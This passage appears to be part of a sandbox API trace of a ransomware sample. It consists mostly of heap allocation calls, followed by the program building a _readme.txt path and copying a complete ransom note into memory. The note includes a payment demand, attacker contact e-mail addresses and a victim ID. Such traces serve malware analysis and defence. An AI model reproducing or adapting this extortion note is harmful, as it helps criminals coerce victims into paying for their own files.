hHeap=0x2c0000) returned 1 [0201.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0201.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0201.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.522] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0201.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.523] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0201.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.523] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.523] PathFindFileNameW (pszPath="") returned="" [0201.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.523] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.523] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0201.523] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b68060 [0201.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68060 | out: hHeap=0x2c0000) returned 1 [0201.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.524] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x3b15070 [0201.524] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0201.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0201.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.524] PathFileExistsW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned 0 [0201.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b68060 [0201.524] lstrcpyW (in: lpString1=0x3b68060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.524] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.524] RtlAllocateHeap (HeapHandle=0x2c0000, 